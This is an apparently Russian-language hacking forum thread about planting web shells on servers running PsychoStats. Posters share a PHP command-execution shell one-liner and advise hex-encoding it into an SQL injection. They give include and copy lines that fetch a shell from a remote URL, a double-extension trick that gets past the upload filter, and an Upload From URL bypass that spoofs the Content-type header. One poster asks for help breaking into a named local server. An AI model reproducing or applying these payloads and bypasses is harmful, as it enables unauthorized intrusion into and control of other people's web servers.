Авторские статьи Заливаем шелл через PsychoStats

Discussion in 'Статьи' started by AFoST, 8 Jan 2008.

  1. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    а там регистр глобалс включен?
    тебе надо вот это вписывать:
    <?php system($_GET['cmd']);?> причем это лучше захекисть в sql запросе
     
    #21 Scipio, 23 Jan 2008
    Last edited: 23 Jan 2008
    1 person likes this.
  2. nightmare007

    nightmare007 New Member

    Joined:
    28 Oct 2006
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Scipio о млин точно ...куль сеньк всем...

    слу ... а как терь нормальный пхп файлик закинуть на машину... плз подкинь идею
     
  3. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    <?php include("http://путь до шелла");?>
    или
    <?php copy("http://путь до шелла","shelcheng.php");?>
    это тоже в хекс исли вариант с copy то он шелл скопирует в текущую папку
    а с инклюдом и так все понятно
     
    1 person likes this.
  4. Lordick

    Lordick New Member

    Joined:
    20 May 2007
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    драсьте.
    у нас есть отдельный "сервер" для игр. виден есессно только в локалке, соответственно адрес 172.17.1.11, так же на сайт можно пройти по сцыле http://games.k26.ru (опять же только в локалке)

    психостатс расположен в http://172.17.1.11/stats
    попробовал сплоит с первой страницы - теперь по http://172.17.1.11/stats/ выдет кучу ошибок и ничего не открыват, по http://games.k26.ru/stats/ все отлично открывается.

    пробовал как в видео. в общем не могу понять. куда можно залить файл. выяснил полный путь сайта. c:/inetpub/wwwroot/stats. видно что это iis. пытался залить файл куда только можно, ничего не получается. может быть потому, что остальные директории запрещены на заливку файлов.
    так же есть http://games.k26.ru/wow (сервер вов). так же пытался туда залить - безуспешно.

    и вот думаю - куда лить файл? :) существуют ли стандартные директории в iis, куда можно лить файлы?
     
  5. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Lordick, найти папку на которую точно есть доступ на запись. Такие папки обычно являются папками хранения всяких аватаров, картинок, вложений и тп. Поищи такие папки в психостате. Если есть форум, посмотри там такую папку.
    А вообще, я смотрю сервер на винде стоит, там нет таких разграничений на прав, как в *никсах и все папки открыты на запись. Magic Quotes может быть включен=>фильтруются ковычки=>запрос некорректен.
     
    #25 AFoST, 1 Feb 2008
    Last edited: 1 Feb 2008
  6. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    помогите как слить шелл с удаленного серва?
    папку с правами нашел.
     
  7. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Заливка шелла в PsychoStats

    Нашёл способ...
    Заходим в админку > значки, переименовываем шелл в что-то типо shell.PHP.hgfgif, заливаем. Главное чтобы расширение оканчивалось на gif ;) Вот собственно и получаем шелл [path]/images/icons/shell.PHP.hgfgif.

    Объясняю как это происходит:
    движок проверяет только три последних символа в расширении файла, поэтому делаем такое расширение PHP.hgfgif, предварительно поставив расширение .PHP. и он этот файл легко пропускает. Для Apach'а расширение .hgfgif неизвестно и поэтому он смотрит на расширение левее и интерпретирует его как php-скрипт!
    Проверяйте: может и на других двигах сработает...
     
    #27 InFlame, 17 Jun 2009
    Last edited: 5 Sep 2009
    1 person likes this.
  8. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    801
    Likes Received:
    145
    Reputations:
    73
    Короче такая ситуация.
    Получил доступ к админке.
    SQL которые были описаны до этого не работают.
    Зашел в админку, добавил расширение для картинок - png, jpg, gif, php
    Так. Теперь в icons (где заливать файлы). Такие методы, как менять расширение, как сказал InFlame - file.PHP.asdgif - не катят. Нашел только такой способ:
    Залил себе на сайт файл. script.php и решил его сразу залить через Upload From URL. - вывел ошибку The URL does not point to an image. Немного подумал. Сделал содержимое файла таким:
    PHP:
    <?php
    header
    ('Content-type: image/php');
    echo 
    'OK!';
    ?>
    Теперь скормил его Upload From URL и файл успешно залился. Переш на него - site.ru/stats/img/icons/script.php и Мне вывело OK!
    Я обрадовался, начал кормить туда шелл. Но ВОТ ТАКАЯ БЕДА!
    Содержимое файла оказывается таким, как он выполняется на моем хосте. Тоесть. Если я напимер сделаю <?php system('dir'); ?> То на хосте жертвы будет красоваться содердимое моего хоста.
    Файл получается статичным.
    Прошу помощи ))))))))))))))
     
  9. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    801
    Likes Received:
    145
    Reputations:
    73
    :-* :-* :-* :-*